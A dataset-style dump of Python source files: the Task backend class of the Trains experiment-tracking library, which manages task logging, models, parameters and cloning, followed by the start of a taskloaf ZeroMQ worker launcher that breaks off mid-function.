source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
task.py
|
""" Backend task management support """
import itertools
import logging
import os
import re
from enum import Enum
from tempfile import gettempdir
from multiprocessing import RLock
from threading import Thread
try:
from collections.abc import Iterable
except ImportError:
from collections import Iterable
import six
from collections import OrderedDict
from six.moves.urllib.parse import quote
from ...utilities.locks import RLock as FileRLock
from ...backend_interface.task.development.worker import DevWorker
from ...backend_api import Session
from ...backend_api.services import tasks, models, events, projects
from pathlib2 import Path
from ...utilities.pyhocon import ConfigTree, ConfigFactory
from ..base import IdObjectBase
from ..metrics import Metrics, Reporter
from ..model import Model
from ..setupuploadmixin import SetupUploadMixin
from ..util import make_message, get_or_create_project, get_single_result, \
exact_match_regex
from ...config import get_config_for_bucket, get_remote_task_id, TASK_ID_ENV_VAR, get_log_to_backend, \
running_remotely, get_cache_dir, DOCKER_IMAGE_ENV_VAR
from ...debugging import get_logger
from ...debugging.log import LoggerRoot
from ...storage.helper import StorageHelper, StorageError
from .access import AccessMixin
from .log import TaskHandler
from .repo import ScriptInfo
from ...config import config, PROC_MASTER_ID_ENV_VAR
class Task(IdObjectBase, AccessMixin, SetupUploadMixin):
""" Task manager providing task object access and management. Includes read/write access to task-associated
frames and models.
"""
_anonymous_dataview_id = '__anonymous__'
_development_tag = 'development'
_store_diff = config.get('development.store_uncommitted_code_diff', False)
class TaskTypes(Enum):
def __str__(self):
return str(self.value)
training = 'training'
testing = 'testing'
def __init__(self, session=None, task_id=None, log=None, project_name=None,
task_name=None, task_type=TaskTypes.training, log_to_backend=True,
raise_on_validation_errors=True, force_create=False):
"""
Create a new task instance.
:param session: Optional API Session instance. If not provided, a default session based on the system's
configuration will be used.
:type session: Session
:param task_id: Optional task ID. If not provided, a new task will be created using the API
and its information reflected in the resulting instance.
:type task_id: string
:param log: Optional log to be used. If not provided, and internal log shared with all backend objects will be
used instead.
:type log: logging.Logger
:param project_name: Optional project name, used only if a new task is created. The new task will be associated
with a project by this name. If no such project exists, a new project will be created using the API.
:type project_name: str
:param task_name: Optional task name, used only if a new task is created.
:type project_name: str
:param task_type: Optional task type, used only if a new task is created. Default is training task.
:type task_type: str (see tasks.TaskTypeEnum)
:param log_to_backend: If True, all calls to the task's log will be logged to the backend using the API.
This value can be overridden using the environment variable TRAINS_LOG_TASK_TO_BACKEND.
:type log_to_backend: bool
:param force_create: If True a new task will always be created (task_id, if provided, will be ignored)
:type force_create: bool
"""
task_id = self._resolve_task_id(task_id, log=log) if not force_create else None
self.__edit_lock = None
super(Task, self).__init__(id=task_id, session=session, log=log)
self._project_name = None
self._storage_uri = None
self._input_model = None
self._output_model = None
self._metrics_manager = None
self._reporter = None
self._curr_label_stats = {}
self._raise_on_validation_errors = raise_on_validation_errors
self._parameters_allowed_types = (
six.string_types + six.integer_types + (six.text_type, float, list, tuple, dict, type(None))
)
self._app_server = None
self._files_server = None
self._initial_iteration_offset = 0
if not task_id:
# generate a new task
self.id = self._auto_generate(project_name=project_name, task_name=task_name, task_type=task_type)
else:
# this is an existing task, let's try to verify stuff
self._validate()
self._project_name = (self.project, project_name)
if running_remotely() or DevWorker.report_stdout:
log_to_backend = False
self._log_to_backend = log_to_backend
self._setup_log(default_log_to_backend=log_to_backend)
def _setup_log(self, default_log_to_backend=None, replace_existing=False):
"""
Setup logging facilities for this task.
:param default_log_to_backend: Should this task log to the backend. If not specified, value for this option
will be obtained from the environment, with this value acting as a default in case configuration for this is
missing.
If the value for this option is false, we won't touch the current logger configuration regarding TaskHandler(s)
:param replace_existing: If True and another task is already logging to the backend, replace the handler with
a handler for this task.
"""
# Make sure urllib is never in debug/info,
disable_urllib3_info = config.get('log.disable_urllib3_info', True)
if disable_urllib3_info and logging.getLogger('urllib3').isEnabledFor(logging.INFO):
logging.getLogger('urllib3').setLevel(logging.WARNING)
log_to_backend = get_log_to_backend(default=default_log_to_backend) or self._log_to_backend
if not log_to_backend:
return
# Handle the root logger and our own logger. We use set() to make sure we create no duplicates
# in case these are the same logger...
loggers = {logging.getLogger(), LoggerRoot.get_base_logger()}
# Find all TaskHandler handlers for these loggers
handlers = {logger: h for logger in loggers for h in logger.handlers if isinstance(h, TaskHandler)}
if handlers and not replace_existing:
# Handlers exist and we shouldn't replace them
return
# Remove all handlers, we'll add new ones
for logger, handler in handlers.items():
logger.removeHandler(handler)
# Create a handler that will be used in all loggers. Since our handler is a buffering handler, using more
# than one instance to report to the same task will result in out-of-order log reports (grouped by whichever
# handler instance handled them)
backend_handler = TaskHandler(self.session, self.task_id)
# Add backend handler to both loggers:
# 1. to root logger root logger
# 2. to our own logger as well, since our logger is not propagated to the root logger
# (if we propagate our logger will be caught be the root handlers as well, and
# we do not want that)
for logger in loggers:
logger.addHandler(backend_handler)
def _validate(self, check_output_dest_credentials=True):
raise_errors = self._raise_on_validation_errors
output_dest = self.get_output_destination(raise_on_error=False, log_on_error=False)
if output_dest and check_output_dest_credentials:
try:
self.log.info('Validating output destination')
conf = get_config_for_bucket(base_url=output_dest)
if not conf:
msg = 'Failed resolving output destination (no credentials found for %s)' % output_dest
self.log.warning(msg)
if raise_errors:
raise Exception(msg)
else:
StorageHelper._test_bucket_config(conf=conf, log=self.log, raise_on_error=raise_errors)
except StorageError:
raise
except Exception as ex:
self.log.error('Failed trying to verify output destination: %s' % ex)
@classmethod
def _resolve_task_id(cls, task_id, log=None):
if not task_id:
task_id = cls.normalize_id(get_remote_task_id())
if task_id:
log = log or get_logger('task')
log.info('Using task ID from env %s=%s' % (TASK_ID_ENV_VAR[0], task_id))
return task_id
def _update_repository(self):
def check_package_update():
try:
# check latest version
from ...utilities.check_updates import CheckPackageUpdates
latest_version = CheckPackageUpdates.check_new_package_available(only_once=True)
if latest_version:
if not latest_version[1]:
sep = os.linesep
self.get_logger().report_text(
'TRAINS new package available: UPGRADE to v{} is recommended!\nRelease Notes:\n{}'.format(
latest_version[0], sep.join(latest_version[2])),
)
else:
self.get_logger().report_text(
'TRAINS new version available: upgrade to v{} is recommended!'.format(
latest_version[0]),
)
except Exception:
pass
# get repository and create requirements.txt from code base
try:
check_package_update_thread = Thread(target=check_package_update)
check_package_update_thread.daemon = True
check_package_update_thread.start()
# do not request requirements, because it might be a long process, and we first want to update the git repo
result, script_requirements = ScriptInfo.get(
log=self.log, create_requirements=False, check_uncommitted=self._store_diff
)
for msg in result.warning_messages:
self.get_logger().report_text(msg)
self.data.script = result.script
# Since we might run asynchronously, don't use self.data (lest someone else
# overwrite it before we have a chance to call edit)
self._edit(script=result.script)
self.reload()
# if jupyter is present, requirements will be created in the background, when saving a snapshot
if result.script and script_requirements:
requirements, conda_requirements = script_requirements.get_requirements()
if requirements:
if not result.script['requirements']:
result.script['requirements'] = {}
result.script['requirements']['pip'] = requirements
result.script['requirements']['conda'] = conda_requirements
self._update_requirements(result.script.get('requirements') or '')
self.reload()
# we do not want to wait for the check version thread,
# because someone might wait for us to finish the repo detection update
except SystemExit:
pass
except Exception as e:
get_logger('task').debug(str(e))
def _auto_generate(self, project_name=None, task_name=None, task_type=TaskTypes.training):
created_msg = make_message('Auto-generated at %(time)s by %(user)s@%(host)s')
project_id = None
if project_name:
project_id = get_or_create_project(self, project_name, created_msg)
tags = [self._development_tag] if not running_remotely() else []
extra_properties = {'system_tags': tags} if Session.check_min_api_version('2.3') else {'tags': tags}
req = tasks.CreateRequest(
name=task_name or make_message('Anonymous task (%(user)s@%(host)s %(time)s)'),
type=tasks.TaskTypeEnum(task_type.value),
comment=created_msg,
project=project_id,
input={'view': {}},
**extra_properties
)
res = self.send(req)
return res.response.id
def _set_storage_uri(self, value):
value = value.rstrip('/') if value else None
self._storage_uri = StorageHelper.conform_url(value)
self.data.output.destination = self._storage_uri
self._edit(output_dest=self._storage_uri or ('' if Session.check_min_api_version('2.3') else None))
if self._storage_uri or self._output_model:
self.output_model.upload_storage_uri = self._storage_uri
@property
def storage_uri(self):
if self._storage_uri:
return self._storage_uri
if running_remotely():
return self.data.output.destination
else:
return None
@storage_uri.setter
def storage_uri(self, value):
self._set_storage_uri(value)
@property
def task_id(self):
return self.id
@property
def name(self):
return self.data.name or ''
@name.setter
def name(self, value):
self.set_name(value)
@property
def task_type(self):
return self.data.type
@property
def project(self):
return self.data.project
@property
def parent(self):
return self.data.parent
@property
def input_model_id(self):
return self.data.execution.model
@property
def output_model_id(self):
return self.data.output.model
@property
def comment(self):
return self.data.comment or ''
@comment.setter
def comment(self, value):
self.set_comment(value)
@property
def cache_dir(self):
""" The cache directory which is used to store the Task related files. """
return Path(get_cache_dir()) / self.id
@property
def status(self):
"""
The Task's status. To keep the Task updated, Trains reloads the Task information when this value
is accessed.
"""
self.reload()
return self._status
@property
def _status(self):
""" Return the task's cached status (don't reload if we don't have to) """
return str(self.data.status)
@property
def input_model(self):
""" A model manager used to handle the input model object """
model_id = self._get_task_property('execution.model', raise_on_error=False)
if not model_id:
return None
if self._input_model is None:
self._input_model = Model(
session=self.session,
model_id=model_id,
cache_dir=self.cache_dir,
log=self.log,
upload_storage_uri=None)
return self._input_model
@property
def output_model(self):
""" A model manager used to manage the output model object """
if self._output_model is None:
self._output_model = self._get_output_model(upload_required=True)
return self._output_model
def create_output_model(self):
return self._get_output_model(upload_required=False, force=True)
def _get_output_model(self, upload_required=True, force=False):
return Model(
session=self.session,
model_id=None if force else self._get_task_property(
'output.model', raise_on_error=False, log_on_error=False),
cache_dir=self.cache_dir,
upload_storage_uri=self.storage_uri or self.get_output_destination(
raise_on_error=upload_required, log_on_error=upload_required),
upload_storage_suffix=self._get_output_destination_suffix('models'),
log=self.log)
@property
def metrics_manager(self):
""" A metrics manager used to manage the metrics related to this task """
return self._get_metrics_manager(self.get_output_destination())
@property
def reporter(self):
"""
Returns a simple metrics reporter instance
"""
if self._reporter is None:
self._setup_reporter()
return self._reporter
def _get_metrics_manager(self, storage_uri):
if self._metrics_manager is None:
self._metrics_manager = Metrics(
session=self.session,
task_id=self.id,
storage_uri=storage_uri,
storage_uri_suffix=self._get_output_destination_suffix('metrics'),
iteration_offset=self.get_initial_iteration()
)
return self._metrics_manager
def _setup_reporter(self):
try:
storage_uri = self.get_output_destination(log_on_error=False)
except ValueError:
storage_uri = None
self._reporter = Reporter(self._get_metrics_manager(storage_uri=storage_uri))
return self._reporter
def _get_output_destination_suffix(self, extra_path=None):
return '/'.join(quote(x, safe="'[]{}()$^,.; -_+-=") for x in
(self.get_project_name(), '%s.%s' % (self.name, self.data.id), extra_path) if x)
def _reload(self):
""" Reload the task object from the backend """
with self._edit_lock:
res = self.send(tasks.GetByIdRequest(task=self.id))
return res.response.task
def reset(self, set_started_on_success=True):
""" Reset the task. Task will be reloaded following a successful reset. """
self.send(tasks.ResetRequest(task=self.id))
if set_started_on_success:
self.started()
self.reload()
def started(self, ignore_errors=True):
""" The signal that this Task started. """
return self.send(tasks.StartedRequest(self.id), ignore_errors=ignore_errors)
def stopped(self, ignore_errors=True):
""" The signal that this Task stopped. """
return self.send(tasks.StoppedRequest(self.id), ignore_errors=ignore_errors)
def completed(self, ignore_errors=True):
""" The signal indicating that this Task completed. """
if hasattr(tasks, 'CompletedRequest'):
return self.send(tasks.CompletedRequest(self.id, status_reason='completed'), ignore_errors=ignore_errors)
return self.send(tasks.StoppedRequest(self.id, status_reason='completed'), ignore_errors=ignore_errors)
def mark_failed(self, ignore_errors=True, status_reason=None, status_message=None):
""" The signal that this Task stopped. """
return self.send(tasks.FailedRequest(self.id, status_reason=status_reason, status_message=status_message),
ignore_errors=ignore_errors)
def publish(self, ignore_errors=True):
""" The signal that this Task will be published """
if str(self.status) != str(tasks.TaskStatusEnum.stopped):
raise ValueError("Can't publish, Task is not stopped")
resp = self.send(tasks.PublishRequest(self.id), ignore_errors=ignore_errors)
assert isinstance(resp.response, tasks.PublishResponse)
return resp
def update_model_desc(self, new_model_desc_file=None):
""" Change the Task's model description. """
with self._edit_lock:
self.reload()
execution = self._get_task_property('execution')
p = Path(new_model_desc_file)
if not p.is_file():
raise IOError('mode_desc file %s cannot be found' % new_model_desc_file)
new_model_desc = p.read_text()
model_desc_key = list(execution.model_desc.keys())[0] if execution.model_desc else 'design'
execution.model_desc[model_desc_key] = new_model_desc
res = self._edit(execution=execution)
return res.response
def update_output_model(self, model_uri, name=None, comment=None, tags=None):
"""
Update the Task's output model. Use this method to update the output model when you have a local model URI,
for example, storing the weights file locally, and specifying a ``file://path/to/file`` URI)
.. important::
This method only updates the model's metadata using the API. It does not upload any data.
:param model_uri: The URI of the updated model weights file.
:type model_uri: str
:param name: The updated model name. (Optional)
:type name: str
:param comment: The updated model description. (Optional)
:type comment: str
:param tags: The updated model tags. (Optional)
:type tags: [str]
"""
self._conditionally_start_task()
self._get_output_model(upload_required=False).update_for_task(model_uri, self.id, name, comment, tags)
def update_output_model_and_upload(
self, model_file, name=None, comment=None, tags=None, async_enable=False, cb=None, iteration=None):
"""
Update the Task's output model weights file. First, Trains uploads the file to the preconfigured output
destination (see the Task's ``output.destination`` property or call the ``setup_upload()`` method),
then Trains updates the model object associated with the Task an API call. The API call uses with the URI
of the uploaded file, and other values provided by additional arguments.
:param model_file: The path to the updated model weights file.
:type model_file: str
:param name: The updated model name. (Optional)
:type name: str
:param comment: The updated model description. (Optional)
:type comment: str
:param tags: The updated model tags. (Optional)
:type tags: [str]
:param async_enable: Request asynchronous upload?
- ``True`` - The API call returns immediately, while the upload and update are scheduled in another thread.
- ``False`` - The API call blocks until the upload completes, and the API call updating the model returns.
(Default)
:type async_enable: bool
:param cb: Asynchronous callback. A callback. If ``async_enable`` is set to ``True``, this is a callback that
is invoked once the asynchronous upload and update complete.
:return: The URI of the uploaded weights file. If ``async_enable`` is set to ``True``, this is the expected URI,
as the upload is probably still in progress.
"""
self._conditionally_start_task()
uri = self.output_model.update_for_task_and_upload(
model_file, self.id, name=name, comment=comment, tags=tags, async_enable=async_enable, cb=cb,
iteration=iteration
)
return uri
def _conditionally_start_task(self):
if str(self.status) == str(tasks.TaskStatusEnum.created):
self.started()
@property
def labels_stats(self):
""" Get accumulated label stats for the current/last frames iteration """
return self._curr_label_stats
def _accumulate_label_stats(self, roi_stats, reset=False):
if reset:
self._curr_label_stats = {}
for label in roi_stats:
if label in self._curr_label_stats:
self._curr_label_stats[label] += roi_stats[label]
else:
self._curr_label_stats[label] = roi_stats[label]
def set_input_model(self, model_id=None, model_name=None, update_task_design=True, update_task_labels=True):
"""
Set a new input model for the Task. The model must be "ready" (status is ``Published``) to be used as the
Task's input model.
:param model_id: The Id of the model on the **Trains Server** (backend). If ``model_name`` is not specified,
then ``model_id`` must be specified.
:param model_name: The model name. The name is used to locate an existing model in the **Trains Server**
(backend). If ``model_id`` is not specified, then ``model_name`` must be specified.
:param update_task_design: Update the Task's design?
- ``True`` - Trains copies the Task's model design from the input model.
- ``False`` - Trains does not copy the Task's model design from the input model.
:param update_task_labels: Update the Task's label enumeration?
- ``True`` - Trains copies the Task's label enumeration from the input model.
- ``False`` - Trains does not copy the Task's label enumeration from the input model.
"""
if model_id is None and not model_name:
raise ValueError('Expected one of [model_id, model_name]')
if model_name:
# Try getting the model by name. Limit to 10 results.
res = self.send(
models.GetAllRequest(
name=exact_match_regex(model_name),
ready=True,
page=0,
page_size=10,
order_by=['-created'],
only_fields=['id', 'created']
)
)
model = get_single_result(entity='model', query=model_name, results=res.response.models, log=self.log)
model_id = model.id
if model_id:
res = self.send(models.GetByIdRequest(model=model_id))
model = res.response.model
if not model.ready:
# raise ValueError('Model %s is not published (not ready)' % model_id)
self.log.debug('Model %s [%s] is not published yet (not ready)' % (model_id, model.uri))
else:
# clear the input model
model = None
model_id = ''
with self._edit_lock:
self.reload()
# store model id
self.data.execution.model = model_id
# Auto populate input field from model, if they are empty
if update_task_design and not self.data.execution.model_desc:
self.data.execution.model_desc = model.design if model else ''
if update_task_labels and not self.data.execution.model_labels:
self.data.execution.model_labels = model.labels if model else {}
self._edit(execution=self.data.execution)
def set_parameters(self, *args, **kwargs):
"""
Set the parameters for a Task. This method sets a complete group of key-value parameter pairs, but does not
support parameter descriptions (the input is a dictionary of key-value pairs).
:param args: Positional arguments, which are one or more dictionary or (key, value) iterable. They are
merged into a single key-value pair dictionary.
:param kwargs: Key-value pairs, merged into the parameters dictionary created from ``args``.
"""
if not all(isinstance(x, (dict, Iterable)) for x in args):
raise ValueError('only dict or iterable are supported as positional arguments')
update = kwargs.pop('__update', False)
with self._edit_lock:
self.reload()
if update:
parameters = self.get_parameters()
else:
parameters = dict()
parameters.update(itertools.chain.from_iterable(x.items() if isinstance(x, dict) else x for x in args))
parameters.update(kwargs)
not_allowed = {
k: type(v).__name__
for k, v in parameters.items()
if not isinstance(v, self._parameters_allowed_types)
}
if not_allowed:
raise ValueError(
"Only builtin types ({}) are allowed for values (got {})".format(
', '.join(t.__name__ for t in self._parameters_allowed_types),
', '.join('%s=>%s' % p for p in not_allowed.items())),
)
# force cast all variables to strings (so that we can later edit them in UI)
parameters = {k: str(v) if v is not None else "" for k, v in parameters.items()}
execution = self.data.execution
if execution is None:
execution = tasks.Execution(parameters=parameters)
else:
execution.parameters = parameters
self._edit(execution=execution)
def set_parameter(self, name, value, description=None):
"""
Set a single Task parameter. This overrides any previous value for this parameter.
:param name: The parameter name.
:param value: The parameter value.
:param description: The parameter description.
.. note::
The ``description`` is not yet in use.
"""
self.set_parameters({name: value}, __update=True)
def get_parameter(self, name, default=None):
"""
Get a value for a parameter.
:param name: Parameter name
:param default: Default value
:return: Parameter value (or default value if parameter is not defined)
"""
params = self.get_parameters()
return params.get(name, default)
def update_parameters(self, *args, **kwargs):
"""
Update the parameters for a Task. This method updates a complete group of key-value parameter pairs, but does
not support parameter descriptions (the input is a dictionary of key-value pairs).
:param args: Positional arguments, which are one or more dictionary or (key, value) iterable. They are
merged into a single key-value pair dictionary.
:param kwargs: Key-value pairs, merged into the parameters dictionary created from ``args``.
"""
self.set_parameters(__update=True, *args, **kwargs)
def set_model_label_enumeration(self, enumeration=None):
"""
Set a dictionary of labels (text) to ids (integers) {str(label): integer(id)}
:param dict enumeration: For example: {str(label): integer(id)}
"""
enumeration = enumeration or {}
with self._edit_lock:
self.reload()
execution = self.data.execution
if enumeration is None:
return
if not (isinstance(enumeration, dict)
and all(isinstance(k, six.string_types) and isinstance(v, int) for k, v in enumeration.items())):
raise ValueError('Expected label to be a dict[str => int]')
execution.model_labels = enumeration
self._edit(execution=execution)
def _set_default_docker_image(self):
if not DOCKER_IMAGE_ENV_VAR.exists():
return
self.set_base_docker(DOCKER_IMAGE_ENV_VAR.get(default=""))
def set_base_docker(self, docker_cmd):
"""
Set the base docker image for this experiment
If provided, this value will be used by trains-agent to execute this experiment
inside the provided docker image.
"""
with self._edit_lock:
self.reload()
execution = self.data.execution
execution.docker_cmd = docker_cmd
self._edit(execution=execution)
def get_base_docker(self):
"""Get the base Docker command (image) that is set for this experiment."""
return self._get_task_property('execution.docker_cmd', raise_on_error=False, log_on_error=False)
def set_artifacts(self, artifacts_list=None):
"""
List of artifacts (tasks.Artifact) to update the task
:param list artifacts_list: list of artifacts (type tasks.Artifact)
"""
if not Session.check_min_api_version('2.3'):
return False
if not (isinstance(artifacts_list, (list, tuple))
and all(isinstance(a, tasks.Artifact) for a in artifacts_list)):
raise ValueError('Expected artifacts to [tasks.Artifacts]')
with self._edit_lock:
self.reload()
execution = self.data.execution
keys = [a.key for a in artifacts_list]
execution.artifacts = [a for a in execution.artifacts or [] if a.key not in keys] + artifacts_list
self._edit(execution=execution)
def _set_model_design(self, design=None):
with self._edit_lock:
self.reload()
execution = self.data.execution
if design is not None:
execution.model_desc = Model._wrap_design(design)
self._edit(execution=execution)
def get_labels_enumeration(self):
"""
Get the label enumeration dictionary label enumeration dictionary of string (label) to integer (value) pairs.
:return: dict
"""
if not self.data or not self.data.execution:
return {}
return self.data.execution.model_labels
def get_model_design(self):
"""
Get the model configuration as blob of text.
:return:
"""
design = self._get_task_property("execution.model_desc", default={}, raise_on_error=False, log_on_error=False)
return Model._unwrap_design(design)
def set_output_model_id(self, model_id):
self.data.output.model = str(model_id)
self._edit(output=self.data.output)
def get_random_seed(self):
# fixed seed for the time being
return 1337
def set_random_seed(self, random_seed):
# fixed seed for the time being
pass
def set_project(self, project_id):
assert isinstance(project_id, six.string_types)
self._set_task_property("project", project_id)
self._edit(project=project_id)
def get_project_name(self):
if self.project is None:
return None
if self._project_name and self._project_name[1] is not None and self._project_name[0] == self.project:
return self._project_name[1]
res = self.send(projects.GetByIdRequest(project=self.project), raise_on_errors=False)
if not res or not res.response or not res.response.project:
return None
self._project_name = (self.project, res.response.project.name)
return self._project_name[1]
def get_tags(self):
return self._get_task_property("tags")
def set_system_tags(self, tags):
assert isinstance(tags, (list, tuple))
if Session.check_min_api_version('2.3'):
self._set_task_property("system_tags", tags)
self._edit(system_tags=self.data.system_tags)
else:
self._set_task_property("tags", tags)
self._edit(tags=self.data.tags)
def set_tags(self, tags):
assert isinstance(tags, (list, tuple))
if not Session.check_min_api_version('2.3'):
# not supported
return
self._set_task_property("tags", tags)
self._edit(tags=self.data.tags)
def set_name(self, name):
"""
Set the Task name.
:param name: The name of the Task.
:type name: str
"""
self._set_task_property("name", str(name))
self._edit(name=self.data.name)
def set_comment(self, comment):
"""
Set a comment / description for the Task.
:param comment: The comment / description for the Task.
:type comment: str
"""
self._set_task_property("comment", str(comment))
self._edit(comment=comment)
def set_initial_iteration(self, offset=0):
"""
Set the initial iteration offset. The default value is ``0``. This method is useful when continuing training
from previous checkpoints.
For example, to start on iteration 100000, including scalars and plots:
..code-block:: py
task.set_initial_iteration(100000)
Task.set_initial_iteration(100000)
:param int offset: Initial iteration (at starting point)
:return: newly set initial offset
"""
if not isinstance(offset, int):
raise ValueError("Initial iteration offset must be an integer")
self._initial_iteration_offset = offset
if self._metrics_manager:
self._metrics_manager.set_iteration_offset(self._initial_iteration_offset)
return self._initial_iteration_offset
def get_initial_iteration(self):
"""
Get the initial iteration offset. The default value is ``0``. This method is useful when continuing training
from previous checkpoints.
:return: The initial iteration offset.
:rtype: int
"""
return self._initial_iteration_offset
def _get_models(self, model_type='output'):
model_type = model_type.lower().strip()
assert model_type == 'output' or model_type == 'input'
if model_type == 'input':
regex = '((?i)(Using model id: )(\w+)?)'
compiled = re.compile(regex)
ids = [i[-1] for i in re.findall(compiled, self.comment)] + (
[self.input_model_id] if self.input_model_id else [])
# remove duplicates and preserve order
ids = list(OrderedDict.fromkeys(ids))
from ...model import Model as TrainsModel
in_model = []
for i in ids:
m = TrainsModel(model_id=i)
try:
# make sure the model is is valid
m._get_model_data()
in_model.append(m)
except:
pass
return in_model
else:
res = self.send(
models.GetAllRequest(
task=[self.id],
order_by=['created'],
only_fields=['id']
)
)
if not res.response.models:
return []
ids = [m.id for m in res.response.models] + ([self.output_model_id] if self.output_model_id else [])
# remove duplicates and preserve order
ids = list(OrderedDict.fromkeys(ids))
from ...model import Model as TrainsModel
return [TrainsModel(model_id=i) for i in ids]
def _get_default_report_storage_uri(self):
if not self._files_server:
self._files_server = Session.get_files_server_host()
return self._files_server
def _get_status(self):
try:
all_tasks = self.send(
tasks.GetAllRequest(id=[self.id], only_fields=['status', 'status_message']),
).response.tasks
return all_tasks[0].status, all_tasks[0].status_message
except Exception:
return None, None
def _reload_last_iteration(self):
try:
all_tasks = self.send(
tasks.GetAllRequest(id=[self.id], only_fields=['last_iteration']),
).response.tasks
self.data.last_iteration = all_tasks[0].last_iteration
except Exception:
return None
@classmethod
def _get_api_server(cls):
return Session.get_api_server_host()
def _get_app_server(self):
if not self._app_server:
self._app_server = Session.get_app_server_host()
return self._app_server
def _edit(self, **kwargs):
with self._edit_lock:
# Since we ae using forced update, make sure he task status is valid
if not self._data or (str(self.data.status) not in (str(tasks.TaskStatusEnum.created),
str(tasks.TaskStatusEnum.in_progress))):
# the exception being name/comment that we can always change.
if kwargs and all(k in ('name', 'comment') for k in kwargs.keys()):
pass
else:
raise ValueError('Task object can only be updated if created or in_progress')
res = self.send(tasks.EditRequest(task=self.id, force=True, **kwargs), raise_on_errors=False)
return res
def _update_requirements(self, requirements):
if not isinstance(requirements, dict):
requirements = {'pip': requirements}
# protection, Old API might not support it
try:
self.data.script.requirements = requirements
self.send(tasks.SetRequirementsRequest(task=self.id, requirements=requirements))
except Exception:
pass
def _update_script(self, script):
self.data.script = script
self._edit(script=script)
@classmethod
def _clone_task(cls, cloned_task_id, name=None, comment=None, execution_overrides=None,
tags=None, parent=None, project=None, log=None, session=None):
"""
Clone a task
:param cloned_task_id: Task ID for the task to be cloned
:type cloned_task_id: str
:param name: New for the new task
:type name: str
:param comment: Optional comment for the new task
:type comment: str
:param execution_overrides: Task execution overrides. Applied over the cloned task's execution
section, useful for overriding values in the cloned task.
:type execution_overrides: dict
:param tags: Optional updated model tags
:type tags: [str]
:param parent: Optional parent Task ID of the new task.
:type parent: str
:param project: Optional project ID of the new task.
If None, the new task will inherit the cloned task's project.
:type project: str
:param log: Log object used by the infrastructure.
:type log: logging.Logger
:param session: Session object used for sending requests to the API
:type session: Session
:return: The new tasks's ID
"""
session = session if session else cls._get_default_session()
res = cls._send(session=session, log=log, req=tasks.GetByIdRequest(task=cloned_task_id))
task = res.response.task
output_dest = None
if task.output:
output_dest = task.output.destination
execution = task.execution.to_dict() if task.execution else {}
execution = ConfigTree.merge_configs(ConfigFactory.from_dict(execution),
ConfigFactory.from_dict(execution_overrides or {}))
# clear all artifacts
execution['artifacts'] = [e for e in execution['artifacts'] if e.get('mode') == 'input']
if not tags and task.tags:
tags = [t for t in task.tags if t != cls._development_tag]
req = tasks.CreateRequest(
name=name or task.name,
type=task.type,
input=task.input if hasattr(task, 'input') else {'view': {}},
tags=tags,
comment=comment or task.comment,
parent=parent,
project=project if project else task.project,
output_dest=output_dest,
execution=execution.as_plain_ordered_dict(),
script=task.script
)
res = cls._send(session=session, log=log, req=req)
cloned_task_id = res.response.id
if task.script and task.script.requirements:
cls._send(session=session, log=log, req=tasks.SetRequirementsRequest(
task=cloned_task_id, requirements=task.script.requirements))
return cloned_task_id
@classmethod
def get_all(cls, session=None, log=None, **kwargs):
"""
List all the Tasks based on specific projection.
:param session: The session object used for sending requests to the API.
:type session: Session
:param log: The Log object.
:type log: logging.Logger
:param kwargs: Keyword args passed to the GetAllRequest (see :class:`.backend_api.services.v2_5.tasks.GetAllRequest`)
For example:
.. code-block:: bash
status='completed', 'search_text'='specific_word', 'user'='user_id', 'project'='project_id'
:type kwargs: dict
:return: The API response.
"""
session = session if session else cls._get_default_session()
req = tasks.GetAllRequest(**kwargs)
res = cls._send(session=session, req=req, log=log)
return res
@classmethod
def get_by_name(cls, task_name):
res = cls._send(cls._get_default_session(), tasks.GetAllRequest(name=exact_match_regex(task_name)))
task = get_single_result(entity='task', query=task_name, results=res.response.tasks)
return cls(task_id=task.id)
def _get_all_events(self, max_events=100):
"""
Get a list of all reported events.
Warning: Debug only. Do not use outside of testing.
:param max_events: The maximum events the function will return. Pass None
to return all the reported events.
:return: A list of events from the task.
"""
log_events = self.send(events.GetTaskEventsRequest(
task=self.id,
order='asc',
batch_size=max_events,
))
events_list = log_events.response.events
total_events = log_events.response.total
scroll = log_events.response.scroll_id
while len(events_list) < total_events and (max_events is None or len(events_list) < max_events):
log_events = self.send(events.GetTaskEventsRequest(
task=self.id,
order='asc',
batch_size=max_events,
scroll_id=scroll,
))
events_list.extend(log_events.response.events)
scroll = log_events.response.scroll_id
return events_list
@property
def _edit_lock(self):
if self.__edit_lock:
return self.__edit_lock
if not PROC_MASTER_ID_ENV_VAR.get() or len(PROC_MASTER_ID_ENV_VAR.get().split(':')) < 2:
self.__edit_lock = RLock()
elif PROC_MASTER_ID_ENV_VAR.get().split(':')[1] == str(self.id):
# remove previous file lock instance, just in case.
filename = os.path.join(gettempdir(), 'trains_{}.lock'.format(self.id))
try:
os.unlink(filename)
except Exception:
pass
# create a new file based lock
self.__edit_lock = FileRLock(filename=filename)
else:
self.__edit_lock = RLock()
return self.__edit_lock
@_edit_lock.setter
def _edit_lock(self, value):
self.__edit_lock = value
@classmethod
def __update_master_pid_task(cls, pid=None, task=None):
pid = pid or os.getpid()
if not task:
PROC_MASTER_ID_ENV_VAR.set(str(pid) + ':')
elif isinstance(task, str):
PROC_MASTER_ID_ENV_VAR.set(str(pid) + ':' + task)
else:
PROC_MASTER_ID_ENV_VAR.set(str(pid) + ':' + str(task.id))
# make sure we refresh the edit lock next time we need it,
task._edit_lock = None
@classmethod
def __get_master_id_task_id(cls):
master_task_id = PROC_MASTER_ID_ENV_VAR.get().split(':')
# we could not find a task ID, revert to old stub behaviour
if len(master_task_id) < 2 or not master_task_id[1]:
return None
return master_task_id[1]
@classmethod
def __is_subprocess(cls):
# notice this class function is called from Task.ExitHooks, do not rename/move it.
is_subprocess = PROC_MASTER_ID_ENV_VAR.get() and \
PROC_MASTER_ID_ENV_VAR.get().split(':')[0] != str(os.getpid())
return is_subprocess
|
zmq_cluster.py
|
import random
from contextlib import ExitStack
import multiprocessing
import psutil
import taskloaf as tsk
from taskloaf.cfg import Cfg
from taskloaf.zmq_comm import ZMQComm
from taskloaf.messenger import JoinMeetMessenger
from taskloaf.context import Context
from taskloaf.executor import Executor
import logging
logger = logging.getLogger(__name__)
def random_name():
return random.getrandbits(64)
def zmq_launcher(cfg):
name = random_name()
if cfg.initializer is not None:
cfg.initializer(name, cfg)
logger.info(
f"Setting up ZeroMQ-based worker with name={name}"
f", addr={cfg.addr()}, and cpu_affinity={cfg.affinity[0]}"
)
if cfg.affinity is not None:
psutil.Process().cpu_affinity(cfg.affinity[0])
import signal
import sys
def sigterm_handler(_signo, _stack_frame):
# Raises SystemExit(0):
sys.exit(0)
